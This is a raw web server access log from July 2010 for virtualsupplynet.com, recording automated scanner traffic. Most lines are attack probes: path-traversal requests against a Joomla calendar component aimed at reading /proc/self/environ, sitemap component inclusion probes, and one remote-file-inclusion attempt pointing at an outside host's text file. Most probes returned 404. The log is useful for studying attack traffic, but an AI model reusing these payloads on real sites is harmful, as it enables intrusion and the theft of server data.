84.255.193.115 - - [12/Jul/2010:21:16:52 -0700] "GET /logs/access_100703.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:21:16:52 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:21:16:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:21:16:52 -0700] "GET /logs/access_100703.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:21:16:53 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:21:16:53 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:21:43:23 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:22:13:32 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:32:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:34:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:38:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:39:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:39:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:39:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:39:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:40:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:22:40:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:40:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:40:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:22:40:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:41:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:22:41:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:43:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:44:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:22:44:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:22:44:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:22:44:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:22:45:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:49:33 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:49:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:49:33 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:49:34 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:16 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:17 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:52:20 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:52:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:52:20 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:52:21 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:38 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:52:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:53:24 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:53:58 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:53:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:53:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:13 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:14 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:54:18 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:54:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:54:18 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:23 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:23 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:54:54 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:55:17 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:55:41 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:55:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:55:42 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:55:59 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:56:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:56:00 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:57:13 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:22:58:05 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:58:25 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:58:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:58:26 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:22:58:42 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:22:59:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:22:59:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:22:59:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:00:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:23:00:22 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:23:00:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:23:00:22 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.221.130.18 - - [12/Jul/2010:23:03:46 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:23:03:57 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:23:03:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:23:03:57 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:05:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:05:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
66.11.230.201 - - [12/Jul/2010:23:06:43 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:23:16:20 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
72.232.217.226 - - [12/Jul/2010:23:16:41 -0700] "GET /logs/business_inc/saveserver.php?thisdir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
72.232.217.226 - - [12/Jul/2010:23:16:41 -0700] "GET /logs/access_100619.log/business_inc/saveserver.php?thisdir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
72.232.217.226 - - [12/Jul/2010:23:16:41 -0700] "GET /business_inc/saveserver.php?thisdir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:27:03 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:27:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:27:04 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:27:06 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:28:34 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:28:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:28:35 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:29:31 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:29:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:29:32 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:30:00 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:31 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:32 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:33 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:31:34 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:37:13 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:37:27 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:40:36 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:40:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
202.181.196.11 - - [12/Jul/2010:23:40:37 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
